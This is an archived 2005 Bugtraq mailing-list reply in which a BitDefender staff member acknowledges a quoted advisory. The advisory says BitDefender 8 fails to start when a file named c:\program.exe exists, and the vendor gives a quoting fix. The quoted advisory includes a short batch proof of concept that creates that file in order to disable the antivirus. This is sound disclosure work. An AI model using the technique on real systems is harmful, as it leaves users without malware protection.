lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 25 Apr 2005 17:47:16 +0300
From: Ovidiu Constantin <oconstantin@...defender.com>
To: bugtraq@...urityfocus.com, SecuBox fRoGGz <unsecure@...teme.com>
Subject: Re: BitDefender 8 - Race condition vulnerability

În data de Sî, 23-04-2005 la 03:03 +0000, SecuBox fRoGGz a scris:
> 
> -----------------------------
> Product: BitDefender
> Version: 8
> Tested on: Windows 2000 SP4
> Vulnerability: Race condition
> -----------------------------
> 
> BACKGROUND
> ----------
> BitDefender ensures the most advanced antivirus protection, as well as data 
> confidentiality, active content control and Internet filtering.
> A powerful antivirus tool with features that best meet your security needs.
> Source: www.bitdefender.com
> 
> 
> VULNERABLE PRODUCTS
> -------------------
> BitDefender 8 Professional Plus
> BitDefender 8 Standard Edition
> Maybe other...
> 
> 
> RACE CONDITION
> --------------
> At Windows startup, when a file named: program.exe is found on c:\ 
> Windows send an alert message, messagebox controls are:
> 2 buttons -> "Rename" or "Ignore"
> 1 checkbox -> [X] Do not do this verification on startup. 
> (Sorry, haven't got the exact english message)
> 
> At this moment, BitDefender can't start, so we have a session without virus protection.
> 
> 
> PROOF OF CONCEPT
> ----------------
> Open your notepad.exe and paste this batch script.
> 
> @echo off
> echo #-------------------------------------------------------#
> echo [   SecuBox - Proof of Concept        (04.12.2005)      ]
> echo #-------------------------------------------------------#
> echo # This script just create the race condition.           #
> echo # It might be use by virus.                             #
> echo # Now, reboot your computer and watch your BitDef !     #
> echo #-------------------------------------------------------#
> echo # Be carefull, for virus protection need another reboot #
> echo # Closing your Windows session is not sufficient !      #
> echo #-------------------------------------------------------#
> echo BitDef PoC > c:\program.exe
> pause
> exit
> 
> 
> EXPLOITATION
> ------------
> Save this batch script as TEST.BAT and try it.
> 
> 
> VENDOR STATUS
> -------------
> Vendor have been contacted but no reply ...
> 
> 
> CREDITS
> ----------------------
> SecuBox Labs - fRoGGz
> unsecure@...teme.com
> ----------------------


Thanks for informing us about this issue. Now we are aware of it and in
short time all BitDefender installation kits will be updated in order
to fix it. The quick fix is to put all the start up commands between "
".

We will keep you posted.

-- 
Ovidiu Constantin - PGP/GPG Key ID 0xBF7F01FF
BitDefender Linux/Unices Testing Project Manager
SOFTWIN / Data Security Division / BitDefender
http://linux.bitdefender.com/

Download attachment "signature.asc" of type "application/pgp-signature" (190 bytes)

View attachment "BitDefender.txt" of type "text/plain" (132 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ